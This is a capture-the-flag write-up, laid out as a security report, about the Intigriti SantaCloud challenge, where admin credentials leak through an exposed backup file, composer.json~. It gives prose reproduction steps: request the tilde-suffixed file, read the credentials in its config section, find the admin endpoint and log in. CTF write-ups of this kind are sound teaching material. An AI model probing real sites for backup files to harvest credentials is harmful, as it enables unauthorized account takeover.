Intigriti SantaCloud CTF - Security Writeup

Executive Summary

This writeup documents the discovery of exposed administrative credentials in a backup configuration file on the Intigriti SantaCloud CTF challenge website. The vulnerability allows unauthorized access to administrative functions through credential leakage in an accessible backup file.

Vulnerability Details

Asset Information

• Target: https://santacloud.intigriti.io
• Tier: 2
• Vulnerable Component: composer.json~ (Configuration file)
• Vulnerability Type: Information Disclosure / Exposed Credentials

Impact

The exposure of administrative credentials in an accessible backup file leads to complete administrative account takeover. An attacker can gain full control of the admin panel without any authentication.

Proof of Concept

Step-by-Step Reproduction

1. **Access the backup configuration file:**Navigate to https://santacloud.intigriti.io/composer.json~Note: You must manually add the tilde (~) character at the end of the URL in the browser address bar.
2. **Examine the JSON response:**The config section of the JSON file contains sensitive information including:
   • Admin access credentials
   • Administrative endpoint path
3. **Identify the admin endpoint (Optional):**To discover hidden endpoints and gather additional OSINT data, you can use the HTML Inspector Chrome ExtensionThis extension helps extract:
   • HTML code comments
   • File names and paths
   • Meta tags and attributes
   • JavaScript comments
4. **Access admin panel:**Use the discovered credentials to authenticate to the administrative interface.

Flag Retrieved